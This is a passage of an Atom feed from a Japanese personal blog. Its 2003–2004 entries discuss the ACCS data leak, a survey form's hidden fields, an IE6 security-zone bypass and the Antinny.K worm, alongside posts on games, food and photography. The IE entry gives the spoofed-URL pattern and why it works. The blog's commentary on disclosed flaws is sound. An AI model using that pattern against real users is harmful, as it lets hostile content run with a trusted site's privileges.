href="../../glossary/%E3%83%87%E3%82%A3%E3%83%AC%E3%82%AF%E3%83%88%E3%83%AA%E3%83%88%E3%83%A9%E3%83%90%E3%83%BC%E3%82%B5%E3%83%AB">ディレクトリトラバーサル</a></dfn>ですし。</p><p class="note">※もしこれがバックドアだとしても、仕掛けたのは office さんではなく <dfn class="glossary"><a href="../../glossary/morikawa%E3%81%95%E3%82%93">morikawaさん</a></dfn>でしょうし。:-)</p><p class="note">※2004-10-07 追記: IT Media の上記引用部分は修正され、「検索エンジンを利用しただけで、ある有名大学のWebサイトから大学の教職員名簿がまるごと見えてしまった」と改められました。また <a href="http://www.e-secure.jp/">NIS/ネット情報セキュリティ研究会</a> <em class="domain-info">(www.e-secure.jp)</em>にも訂正のコメントが出ています (shinさん情報ありがとうございます)。</p><ul class="comment-link"><li><a href="../topic/1995/comment">「不正アクセス禁止法に抵触しない程度の簡単なバックドアって?」へのコメント (6件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/ACCS">ACCS</a> / <a href="../genre/ASK%20ACCS%20%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9%E4%BA%8B%E4%BB%B6">ASK ACCS 個人情報漏洩事件</a></span></p></div></div></content></entry><entry><title>ココログ大アンケート</title><link href="http://bakera.jp/ebi/topic/1349" /><id>tag:bakera.jp,2008:/ebi/topic/1349</id><updated>2004-08-02T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/7/30">2004年7月30日(金曜日)</a></h1><div class="topic"><h2><a href="../topic/1349">ココログ大アンケート</a></h2><p class="subinfo"><span class="updated">更新: 2004年8月2日</span></p><p><a href="http://www.cocolog-nifty.com/hakusyo/">ココログ大アンケート</a> <em class="domain-info">(www.cocolog-nifty.com)</em>ですが、ソースを見た瞬間に嫌な予感が。</p><div class="sample"><pre>
&lt;form method="post" action="https://www.nifty.com/webapp2/multi/multiform"&gt;
&lt;input type="hidden" name="knaji_code"      value="x-sjis"&gt;
&lt;input type="hidden" name="dirctory"       value="cocolog_hakusyo"&gt;
&lt;input type="hidden" name="form_num"        value="46"&gt;
&lt;input type="hidden" name="thanks_URL"      value="http://www.cocolog-nifty.com/hakusyo/thanks.html"&gt;
&lt;input type="hidden" name="error_URL"       value="http://www.cocolog-nifty.com/hakusyo/error.html"&gt;
&lt;input type="hidden" name="necessary_num"    value="1,2,4,5,6,7,8,9,10,11,13,14,15,16,17,19,20,21,29,30,31,32,35,37,43,44,46"&gt;
&lt;input type="hidden" name="fukusuu_num"     value="18,19,20,23,43"&gt;
&lt;input type="hidden" name="zenkaku_num"     value=""&gt;
&lt;input type="hidden" name="mailaddr_num"    value="46"&gt;
&lt;input type="hidden" name="hankakusu_num"    value=""&gt;
&lt;input type="hidden" name="hankakueisu_num"    value=""&gt;
</pre></div><p>まあ knaji_code というのは別に良いのですけど……もごもご。</p><p class="note">※2004-08-02 追記: アンケート閉鎖されてますね。</p><ul class="comment-link"><li><a href="../topic/1349/comment">「ココログ大アンケート」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%83%8B%E3%83%95%E3%83%86%E3%82%A3">ニフティ</a> / <a href="../genre/%E3%82%B3%E3%82%B3%E3%83%AD%E3%82%B0">ココログ</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>またまた URL 偽装系ホゥル、と思いきやゾーンも偽装される</title><link href="http://bakera.jp/ebi/topic/1318" /><id>tag:bakera.jp,2008:/ebi/topic/1318</id><updated>2004-06-20T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/6/15">2004年6月15日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/1318">またまた URL 偽装系ホゥル、と思いきやゾーンも偽装される</a></h2><p class="subinfo"><span class="updated">更新: 2004年6月20日</span></p><p>「<a href="http://internet.watch.impress.co.jp/cda/news/2004/06/14/3479.html">IE6のセキュリティゾーン設定をすり抜けられてしまう脆弱性</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>」という話。</p><p>http://[trusted_site]%2F%20%20%20.[malicious_site]/ のような URL にアクセスしようとしたとき……</p><ul><li>[malicious_site] 側の DNS でワイルドカード A が設定されていると、サブドメインに %2F%20%20%20 なんてのが含まれていても平気で名前解決できてしまう</li><li>Host: に %2F%20%20%20 が含まれていても Bad Request にならない Web サーバだと、普通にアクセスできてしまう</li></ul><p>……というわけでアクセスできてしまう場合があり、このとき IE はこのリソースを [trusted_site] の属するゾーンの権限で処理してしまうというお話。URL 欄が偽装されるだけではなく、実際にそのゾーンで処理されてしまうので、「クロスドメインのセキュリティモデルが崩壊している」状態であり、とても危険です。</p><div class="quote-and-cite"><blockquote cite="http://internet.watch.impress.co.jp/cda/news/2004/06/14/3479.html"><p>Secuniaによると、IEの全セキュリティゾーンにおけるセキュリティレベルを“高”にすることでこの脆弱性を回避できるとしている。</p></blockquote><p class="cite">以上、<a href="http://internet.watch.impress.co.jp/cda/news/2004/06/14/3479.html">IE6のセキュリティゾーン設定をすり抜けられてしまう脆弱性</a> より</p></div><p>って …… v4.windowsupdate.microsoft.com で ActiveX コントロールが動作しないと困るのですが……。</p><p class="note">※ところで、Microsoft の DNS でワイルドカード A レコードって設定できるのでしょうか。追試しようと思ったのですがやり方が分からなくて……。</p><p class="note">※2004-06-20 追記: こーせーさんから情報をいただきました(ありがとうございます)。Windows DNS では管理コンソールからワイルドカード Aレコードを設定することはできませんが、%systemroot%\system32\dns にあるファイルを直接書き換えれば設定できるようです。</p><ul class="comment-link"><li><a href="../topic/1318/comment">「またまた URL 偽装系ホゥル、と思いきやゾーンも偽装される」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/Windows">Windows</a> / <a href="../genre/Internet%20Explorer">Internet Explorer</a></span></p></div></div></content></entry><entry><title>ACCS個人情報漏洩問題についての総括</title><link href="http://bakera.jp/ebi/topic/1217" /><id>tag:bakera.jp,2008:/ebi/topic/1217</id><updated>2004-04-14T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/4/12">2004年4月12日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/1217">ACCS個人情報漏洩問題についての総括</a></h2><p class="subinfo"><span class="updated">更新: 2004年4月14日</span></p><p>「<a href="http://internet.watch.impress.co.jp/cda/news/2004/04/12/2757.html">A.D.200X実行委員会、ACCS個人情報漏洩問題について総括を発表</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>」ということで、「<a href="http://www.ad200x.net/20040412.html">A.D.2003会場におけるACCS個人情報漏洩問題についての総括 (1)</a> <em class="domain-info">(www.ad200x.net)</em>」が出ていますね。</p><p class="note">※ちなみに Internet Watch の記事では「office氏」であるべきところが「Office氏」となっていて私と同じ過ちを犯しているわけですが、こういうツッコミを入れる窓口ってあるのかしら。</p><p class="note">※2004-04-14 追記 : yuuさんに教えてもらった窓口に指摘のメールを送ったところ、速攻で直して頂けました。ありがとうございます。</p><div class="quote-and-cite"><blockquote cite="http://www.ad200x.net/20040412.html"><p>2003年11月11日、office氏の発表内容をA.D.200Xが確認、事態の深刻さを認識しました。office氏に対し、該当個人情報の即刻削除を要請し、該当資料を保持しているA.D.200X参加者の確認作業と削除要請を開始しました。確認できた資料保持者からは削除済みの連絡を受け、 ACCSには該当資料は削除され拡散の恐れは低いと報告しましたが、後日、該当資料が最大でA.D.2003参加者全員(約250名)に流出した可能性がある事が分かりました。</p></blockquote><p class="cite">以上、<a href="http://www.ad200x.net/20040412.html">A.D.2003会場におけるACCS個人情報漏洩問題についての総括 (1)</a> より</p></div><p>謎はひとつ解けましたが……ここで言う「後日」というのはいつのことなのでしょう。</p><div class="quote-and-cite"><blockquote cite="http://www.ad200x.net/20040412.html"><p>2003年11月11日より、A.D.200Xでは2chやP2Pネットワーク、および様々なblogや掲示板等を対象に、該当資料の流出がないかどうかの監視活動を開始しました。監視は、毎日数時間程度ではありますが、現在に至るまで毎日行われております。</p></blockquote><p class="cite">以上、<a href="http://www.ad200x.net/20040412.html">A.D.2003会場におけるACCS個人情報漏洩問題についての総括 (1)</a> より</p></div><p>とあるのですが、この監視を開始した時点では「該当資料が最大でA.D.2003参加者全員(約250名)に流出した可能性がある」ことは分かっていなかったのでしょうか。流出の可能性を知らなかったけれど一応監視していたのか、それとも日付が typo しているのか……。</p><div class="quote-and-cite"><blockquote cite="http://www.ad200x.net/20040412.html"><p>しかしこの報道により、配布された発表資料中に個人情報が記載されている事が公表されたため、これを受け、2004年1月8日、本件についてのアナウンスをA.D.200Xのwebサイトで行い、2004年1月11日、該当資料を保持していないと思われるA.D.2003参加者も含め、参加者全員に対して配布された資料に個人情報が記載されている事を通知し、その資料をもし保持していた場合は速やかに破棄するよう求めました。</p></blockquote><p class="cite">以上、<a href="http://www.ad200x.net/20040412.html">A.D.2003会場におけるACCS個人情報漏洩問題についての総括 (1)</a> より</p></div><p>参加者全員に対し、というのは微妙にダウトで、実は A.D.2003 に参加した後にメールアドレスが変わったために連絡を受けられなかったという人が存在していたりします。細かいですけど。</p><p class="note">※というか、A.D.200X 側でも把握してないのかな。</p><ul class="comment-link"><li><a href="../topic/1217/comment">「ACCS個人情報漏洩問題についての総括」へのコメント (11件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9">情報漏洩</a> / <a href="../genre/ACCS">ACCS</a> / <a href="../genre/ASK%20ACCS%20%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9%E4%BA%8B%E4%BB%B6">ASK ACCS 個人情報漏洩事件</a></span></p></div></div></content></entry><entry><title>強くて……</title><link href="http://bakera.jp/ebi/topic/492" /><id>tag:bakera.jp,2008:/ebi/topic/492</id><updated>2004-04-13T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/4/6">2003年4月6日(日曜日)</a></h1><div class="topic"><h2><a href="../topic/492">強くて……</a></h2><p class="subinfo"><span class="updated">更新: 2004年4月13日</span></p><p>「強くてニューゲーム」というモードの初出はたぶん「<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B00005OVFD&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">クロノ・トリガー</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B00005OVFD" alt="" width="1" height="1" /></span>」だと思いますが、<span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B0000794JI&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">FF10-2</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B0000794JI" alt="" width="1" height="1" /></span> にもそのモードがあって、「2周目」以降を楽しむことができます。</p><p>2周目以降に受け継がれるものは以下の通り。</p><ul><li>ドレスフィア (スペシャルドレス含む)</li><li>覚えたアビリティ (習得中のものについては AP もそのまま残ります)</li><li>リザルトプレート (セットしたドレスフィアの配置も原則としてそのまま継承。ただし初期装備の「歩み始める者」のみリセットされている)</li><li>所持金</li><li>全てのアクセサリ (「なにごともな～い」や「アダマンタイト」などのレアもの含む)</li><li>ほぼすべての消費アイテム。ただしギザールの野菜は無くなります。これは、チョコボ小屋が存在しない状態でチョコボを捕獲する事が出来ないように、ということでしょう。パサーナの野菜、ミメットの野菜、シルキスの野菜は残りますが、クラスコ預け分はなくなります。</li><li>「大事なもの」のうち、アルベド語辞典とアビリティ習得用のアイテム</li><li>プレイ時間</li><li>COMPLETED率</li><li>ガンシューティングのレベルとハイスコア</li><li>人物事典</li><li>魔物事典</li><li>ブリッツボールのチームレベル、選手のステータス、獲得したコマンド</li></ul><p>ちなみに、既に持っているドレスフィアを 2周目で手に入れると、ドレスフィアの所持数がカウントされて行きます。一つのリザルトプレートに同じドレスフィアを複数セットすることが出来るようになります。……ほとんど意味ありませんが。</p><p>リザルトプレートの場合は、既に持っているものを再び入手しても何も起きません。</p><p>COMPLETED率が継承されています。1周目で体験していなかったミッションをクリアすれば上がります。おそらく1周で 100% にするのは不可能なので (たとえば、新エボン党と青年同盟の二者択一によって体験できるミッションが違う)、何周もして 100% を目指そう、ということなのでしょう。</p><p class="note">※追記: どうもこの数値は、1周で体験できるイベントを全て完璧にこなしたときを 100% としているようです。排他的なイベントがあるので、2周以上すれば論理上は 100% を超えることが可能ですが、表示は 100% が最高ということのようです。</p><p>意外ですがプレイ時間も継承されています。所持金も、クロノ・トリガーなんかでは継承されていませんでしたが、FF10-2 ではしっかり継承されています。</p><p>困るのはガンシューティングのスコアが継承されていることで、しかも腹立たしいことに、 1周目の自分のハイスコアが 2周目のベクレムのスコアにされてしまっています。つまり 1周目のハイスコアを超えないとミッションクリアできません。さらにガンシューティングのレベルも継承されているため、レベルアップ時に貰えるはずのご褒美が貰えなかったりします。「アダマンタイト」はけっこう重要なのですが、複数入手は出来ない模様……。</p><p>逆に、継承されそうでされていないのが以下のようなもの。</p><ul><li>レベルと経験値</li><li>スフィアブレイクのコイン</li><li>クラスコの牧場のチョコボ</li></ul><p>「強くて」ニューゲームと言いつつ、レベルは 1 に戻ります。まあ、強いアクセサリが継承されているので、装備を調えるといきなり強くなりますが……。</p><p>つらいのは、スフィアブレイクのコイン。せっかく集めたレアコインや価値を上げたコインが全部無くなってしまいます。<strong>がっかり。</strong></p><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/492/comment">「強くて……」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%83%A1%E3%83%A2">メモ</a> / <a href="../genre/%E3%82%B2%E3%83%BC%E3%83%A0">ゲーム</a> / <a href="../genre/%E3%82%B9%E3%82%AF%E3%82%A6%E3%82%A7%E3%82%A2">スクウェア</a> / <a href="../genre/%E3%83%95%E3%82%A1%E3%82%A4%E3%83%8A%E3%83%AB%E3%83%95%E3%82%A1%E3%83%B3%E3%82%BF%E3%82%B8%E3%83%BC">ファイナルファンタジー</a> / <a href="../genre/%E3%83%95%E3%82%A1%E3%82%A4%E3%83%8A%E3%83%AB%E3%83%95%E3%82%A1%E3%83%B3%E3%82%BF%E3%82%B8%E3%83%BCX-2">ファイナルファンタジーX-2</a></span></p></div></div></content></entry><entry><title>Antinny.K</title><link href="http://bakera.jp/ebi/topic/1198" /><id>tag:bakera.jp,2008:/ebi/topic/1198</id><updated>2004-04-05T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/4/1">2004年4月1日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/1198">Antinny.K</a></h2><p class="subinfo"><span class="updated">更新: 2004年4月5日</span></p><p>各所でかなり洒落にならない「戦果」を挙げている Antinny.G ですが、<a href="http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.antinny.k.html">Antinny.K</a> <em class="domain-info">(www.symantec.co.jp)</em> という亜種が出たようですね。</p><div class="quote-and-cite"><blockquote cite="http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.antinny.k.html"><p>システムの日付が 4 月以降で、かつ、月と日の数値が同一の場合、http:/ /www.accsjp.or.jp にアクセスし、個人情報を送信しようとします。</p></blockquote><p class="cite">以上、<a href="http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.antinny.k.html">W32.Antinny.K </a> より</p></div><p>うわお。意図は何となく分かるのですが、送られたものはいったいどのように扱われるのでしょうね。</p><p>ひょっとすると、また Aレコード消滅の方向なのかも……。</p><ins datetime="2004-04-05"><p class="note">※2004-04-05 追記: 予想通り Aレコード消滅しましたね……。</p></ins><ul class="comment-link"><li><a href="../topic/1198/comment">「Antinny.K」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%82%B3%E3%83%B3%E3%83%94%E3%83%A5%E3%83%BC%E3%82%BF%E3%82%A6%E3%82%A3%E3%83%AB%E3%82%B9">コンピュータウィルス</a> / <a href="../genre/ACCS">ACCS</a></span></p></div></div></content></entry><entry><title>窓使いの憂鬱</title><link href="http://bakera.jp/ebi/topic/1082" /><id>tag:bakera.jp,2008:/ebi/topic/1082</id><updated>2004-01-28T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2004/1/27">2004年1月27日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/1082">窓使いの憂鬱</a></h2><p class="subinfo"><span class="updated">更新: 2004年1月28日</span></p><div class="quote-and-cite"><blockquote cite="http://mayu.sourceforge.net/mayu/doc/MANUAL-ja.html"><p>標準でない キーボードドライバを利用していると WindowsNT/2000 が青画面になって終了してしまうことがあります。</p></blockquote><p class="cite">以上、<a href="http://mayu.sourceforge.net/mayu/doc/MANUAL-ja.html">窓使いの憂鬱 - MANUAL</a> より</p></div><p>それはたとえばこんな感じですね。</p><div class="figure"><img src="../img/yu-utsu" alt="[写真 : mayud.sys のエラーでブルースクリーン出ちゃってます。]" width="200" height="150" /></div><p>WindowsNT/2000 だけでなく、Windows XP でも行けるみたいです。しくしく。</p><div class="quote-and-cite"><blockquote cite="http://mayu.sourceforge.net/mayu/doc/MANUAL-ja.html"><p>そのような場合は、標準でないドライバをアンインストールするか、「窓使いの憂鬱」の利用をあきらめるしかありません。 </p></blockquote><p class="cite">以上、<a href="http://mayu.sourceforge.net/mayu/doc/MANUAL-ja.html">窓使いの憂鬱 - MANUAL</a> より</p></div><p>む、無念なり。</p><p class="note">※2004-01-28 追記 : 単にバージョン 3.28 は Windows XP に対応していないのだそうで。3.29 にしたら問題ありませんでした。</p><ul class="comment-link"><li><a href="../topic/1082/comment">「窓使いの憂鬱」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E5%87%BA%E6%9D%A5%E4%BA%8B">出来事</a></span></p></div></div></content></entry><entry><title>FPROG非公式忘年会 in たん清</title><link href="http://bakera.jp/ebi/topic/1040" /><id>tag:bakera.jp,2008:/ebi/topic/1040</id><updated>2004-01-07T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/12/29">2003年12月29日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/1040">FPROG非公式忘年会 in たん清</a></h2><p class="subinfo"><span class="updated">更新: 2004年1月7日</span></p><p>たん<ruby><rb>清</rb><rp>(</rp><rt>きよ</rt><rp>)</rp></ruby>でオフということで、肉系の写真を撮りまくりました。</p><ul><li><p>「甘栗太郎」の看板が点滅している図。</p><div class="figure"><img src="../img/amaguri-taroh" alt="" width="150" height="200" /></div><p>……CI 的に看板がこの状態なのはどうよ、という話ですが、動画じゃないと点滅ぶりが分かりにくいのが難点。</p></li><li><p>たん<ruby><rb>清</rb><rp>(</rp><rt>きよ</rt><rp>)</rp></ruby>の看板。</p><div class="figure"><img src="../img/tankiyo" alt="" width="150" height="200" /></div><p>……思いっきり白トビして失敗。発光物体を撮るのも難しいです。手動で露出を調整しないと駄目かもしれません。</p></li><li><p>謎のベルギービール。</p><div class="figure"><img src="../img/beer" alt="" width="200" height="150" /></div><p>……味も謎。</p></li><li><p>上タン塩と付属のレモン、を撮ったら……</p><div class="figure"><img src="../img/tan-shio" alt="" width="200" height="150" /></div><p>どうも他と色味が違う写真が。テーブルの色を前の写真と比較すると、全然違います。配置の関係で中央に白いおしぼりが入ってしまったため、それが白く見えるようにホワイトバランスが自動調整されたのでしょう。</p><p>店の雰囲気などをそのまま撮りたい場合は、ホワイトバランスを自動調整しないほうが吉かもしれません。</p></li><li><p>ともあれ焼きます。</p><div class="figure"><img src="../img/tan-shio2" alt="" width="200" height="150" /></div></li><li><p>盛り合わせ登場。7000円ぶんのお肉が乗っています。</p><div class="figure"><img src="../img/moriawase" alt="" width="210" height="150" /></div></li><li><p>デフラグしながらガンガン焼きます。周囲は混沌の小宇宙。</p><div class="figure"><img src="../img/moriawase2" alt="" width="200" height="150" /></div><p>このあとえむけいさんと山羊丸さんが合流するのですが、そのころにはもう跡形もなく……。</p></li><li><p>山羊丸さんの Optio S。私の Optio S4 と形状はほぼ同じ。</p><div class="figure"><img src="../img/optios" alt="" width="200" height="150" /></div><p>左上の被写体ブレは、えむけいさんがおしぼりをつかむ決定的瞬間?</p></li><li><p>追加のカルビのたれとネギ塩が登場。</p><div class="figure"><img src="../img/karubi" alt="" width="200" height="150" /></div><p>左上の上タン塩は、えむけいさんが追加した二皿目。</p></li><li><p>そして山羊丸さん曰く、「禁断の」野菜。何で禁断かというと、たいてい焼くのに失敗するからだそうな。</p><ins datetime="2004-01-07"><p class="note">※2004-01-07 追記: 禁断発言は山羊丸さんではなくフィンローダさんだったのではないかという説が。ちょっと覚えてません。</p></ins><div class="figure"><img src="../img/yasai" alt="" width="200" height="150" /></div><p>……っていうか誰かの手がナイスタイミングで……。</p></li><li><p>山羊丸さんの頼んだ麦飯。</p><div class="figure"><img src="../img/mugimeshi" alt="" width="200" height="150" /></div><p>ちなみにこれは意図的にホワイトバランス調整しました。でないと麦の感じがわかりにくかったので。</p></li><li><p>私が頼んだ冷麺。</p><div class="figure"><img src="../img/reimen" alt="" width="200" height="150" /></div><p>……一応撮れているのですが、実は微妙にピンぼけしていて、背後の肉にピントが合ってしまっているという失敗作。変なところでシャッター半押ししてしまった模様。</p></li><li><p>「しょうゆ」と書かれたビンに入った、どう見ても醤油とは思えない液体。</p><div class="figure"><img src="../img/su" alt="" width="150" height="200" /></div><p>……酢でした。</p></li><li><p>フィンローダさんの雑炊。</p><div class="figure"><img src="../img/zatsutaki" alt="" width="200" height="150" /></div><p>「ぞうすい」ではなく「ざつたき」なのではないかという話。</p></li></ul><p>というわけでたん清を満喫。</p><p>その後ジョナサンに移動するも、禁煙席が空かずに待たされることに。</p><ul><li><p>タバコ自販機の、エントリがあるのに対応するボタンがないというインターフェイス。</p><div class="figure"><img src="../img/tabaco-nobutton" alt="" width="200" height="150" /></div></li></ul><p>40分ほど待っているうちにむらまささんと合流。しかし席は空かず……。</p><p>もののけ一行は別のジョナサンへ。何故かジョナサンにこだわる一行。</p><ul><li><p>ココログを更新するフィンローダさん。</p><div class="figure"><img src="../img/cocolog-phin-sama" alt="" width="200" height="150" /></div><p>いちおうモザイク処理でプライヴァシーに配慮してみました。</p></li><li><p>りゅうさんにより発掘された、去年のもち米シューマイレシート。</p><div class="figure"><img src="../img/mochigome" alt="" width="200" height="24" /></div></li></ul><ul class="comment-link"><li><a href="../topic/1040/comment">「FPROG非公式忘年会 in たん清」へのコメント (6件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%82%E3%81%AE%E3%81%AE%E3%81%91">もののけ</a> / <a href="../genre/%E3%83%95%E3%82%A3%E3%83%B3%E3%83%AD%E3%83%BC%E3%83%80%E3%81%95%E3%82%93">フィンローダさん</a> / <a href="../genre/%E3%82%8A%E3%82%85%E3%81%86%E3%81%95%E3%82%93">りゅうさん</a> / <a href="../genre/%E3%81%88%E3%82%80%E3%81%91%E3%81%84%E3%81%95%E3%82%93">えむけいさん</a> / <a href="../genre/%E5%B1%B1%E7%BE%8A%E4%B8%B8%E3%81%95%E3%82%93">山羊丸さん</a> / <a href="../genre/%E3%82%80%E3%82%89%E3%81%BE%E3%81%95%E3%81%95%E3%82%93">むらまささん</a></span></p></div></div></content></entry><entry><title>いろいろ撮ってみる2</title><link href="http://bakera.jp/ebi/topic/1014" /><id>tag:bakera.jp,2008:/ebi/topic/1014</id><updated>2003-12-18T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/12/17">2003年12月17日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/1014">いろいろ撮ってみる2</a></h2><p class="subinfo"><span class="updated">更新: 2003年12月18日</span></p><p>引き続き、デジタルカメラの練習。</p><ul><li><p>夜景モードのテスト。</p><div class="figure"><img src="../img/skytower" alt="" width="200" height="150" /></div><p>……心霊現象発生。</p><p>フィルムカメラ (銀塩カメラ) の場合、夜景を撮る際は僅かな光で感光させるためにシャッタースピードを遅くしているわけで、ぶれが致命的な結果になるのは分かります。デジタルカメラでも同じなんでしょうか？</p><p class="note">※追記: やっぱりデジタルカメラでも同じで、三脚などでカメラをしっかり固定する必要があるそうです。義珍さん、みなづきさん、アドバイスありがとうございます。</p><p class="note">※2003-12-18 追記: よく見たら取説にも「暗いシーンでの撮影ではシャッター速度が遅くなりますので、手ぶれしないよう、カメラを三脚等に固定して撮影してください」と書いてありました……。</p></li><li><p>ゲーム画面を撮ってみたり。</p><div class="figure"><img src="../img/tear-ring-saga" alt="" width="200" height="158" /></div><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B00005OVSG&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">ティアリングサーガ</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B00005OVSG" alt="" width="1" height="1" /></span>のステータス画面。静止している画面なのですが、やっぱりテレビの画面はうまく取れないですね。攻略サイトなんかのきれいな画面は、エミュレータを使ってキャプチャしているらしいですけれど。</p></li></ul><div class="amazon-list"><p /></div><ul class="comment-link"><li><a href="../topic/1014/comment">「いろいろ撮ってみる2」へのコメント (10件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%AB%E3%83%A1%E3%83%A9">カメラ</a> / <a href="../genre/%E5%86%99%E7%9C%9F">写真</a></span></p></div></div></content></entry><entry><title>匠味</title><link href="http://bakera.jp/ebi/topic/1000" /><id>tag:bakera.jp,2008:/ebi/topic/1000</id><updated>2003-12-16T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/12/10">2003年12月10日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/1000">匠味</a></h2><p class="subinfo"><span class="updated">更新: 2003年12月16日</span></p><p>とても久しぶりにモスバーガーに行き、せっかくなので限定品の<a href="http://www.mos.co.jp/spotlight/030807/takumi.html">匠味チーズ</a> <em class="domain-info">(www.mos.co.jp)</em>を食べてみました。</p><p>さすがに味は良いのですが、食べにくいのが難点。これはモスバーガーのハンバーガー全般に言えるのですが、ジューシーな分だけ食べにくくもあるわけで……。包みから出さずに食べれば良いと人は言うのですが、これがなかなか難しいです。もう少し小さいと良いと思うのですが。</p><p class="note">※実際、むらまささんがソースを垂らして大ダメージ。</p><p class="note">※ジューシーでなくして欲しいわけではありませんので、念のため。</p><ins datetime="2003-12-16"><p>なお、匠味を買うともれなく製造責任者直筆のカードがもらえます。せっかくなので写真。プライヴァシーを考慮して、署名部分はいちおうモザイク処理しました。</p><div class="figure"><img src="../img/takumi-card" alt="「師走……昔の人はうまいこと考えましたよね……」という" width="118" height="200" /></div><p>深い含蓄があるような無いようなお言葉が入っていますが、これは一枚一枚異なっています。</p></ins><ul class="comment-link"><li><a href="../topic/1000/comment">「匠味」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E5%87%BA%E6%9D%A5%E4%BA%8B">出来事</a> / <a href="../genre/%E9%A3%B2%E9%A3%9F%E7%89%A9">飲食物</a> / <a href="../genre/%E5%86%99%E7%9C%9F">写真</a></span></p></div></div></content></entry><entry><title>ホームページ・リーダーでイメージマップを読む</title><link href="http://bakera.jp/ebi/topic/1002" /><id>tag:bakera.jp,2008:/ebi/topic/1002</id><updated>2003-12-12T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2003/12/11">2003年12月11日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/1002">ホームページ・リーダーでイメージマップを読む</a></h2><p class="subinfo"><span class="updated">更新: 2003年12月12日</span></p><p><span class="amazon"><a href="http://www.amazon.co.jp/exec/obidos/redirect?link_code=as2&amp;path=ASIN/B00005ONA0&amp;tag=bakerajp-22&amp;camp=247&amp;creative=1211">IBM ホームページ・リーダー</a> <em class="domain-info">(www.amazon.co.jp)</em><img src="http://www.assoc-amazon.jp/e/ir?t=bakerajp-22&amp;l=as2&amp;o=9&amp;a=B00005ONA0" alt="" width="1" height="1" 